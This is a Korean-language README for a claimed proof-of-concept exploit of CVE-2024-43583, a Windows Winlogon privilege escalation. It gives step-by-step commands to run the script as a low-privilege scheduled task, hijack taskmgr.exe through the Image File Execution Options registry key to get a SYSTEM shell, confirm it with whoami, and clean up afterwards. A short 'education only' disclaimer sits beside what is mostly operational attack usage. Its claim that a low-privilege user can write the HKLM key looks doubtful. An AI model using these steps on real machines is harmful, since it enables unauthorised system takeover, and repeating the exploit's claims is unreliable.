
CVE-2024-43583에 대한 개념 증명
저자: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583은 Microsoft의 Winlogon 구성 요소에 영향을 미치는 권한 상승 취약점입니다. 이 결함을 악용하면 낮은 권한의 사용자가 자신의 권한을 SYSTEM으로 상승시켜 전체 시스템을 장악할 수 있습니다.
이 개념 증명(PoC)은 Windows Image File Execution Options (IFEO) 레지스트리 키를 통한 디버거 하이재킹을 이용하여 합법적인 시스템 프로세스를 악성 페이로드로 대체합니다.
영향을 받는 Windows 버전
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
이 익스플로잇은 교육 및 연구 목적으로만 사용해야 합니다. 승인되지 않은 시스템에서 사용하지 마십시오. 이 익스플로잇을 오용하면 불법이 될 수 있습니다.
대상 시스템에 Python이 설치되어 있는지 확인하십시오. 그렇지 않으면 컴파일된 .exe 버전을 사용하십시오.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc)를 엽니다. 성공하면 대신 SYSTEM 셸이 나타납니다.익스플로잇이 실행되면 권한을 확인하십시오:
whoami
예상 출력:
nt authority\system
스크립트를 다시 실행하고 **옵션 [2]**를 선택하여 하이재킹을 제거하십시오.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"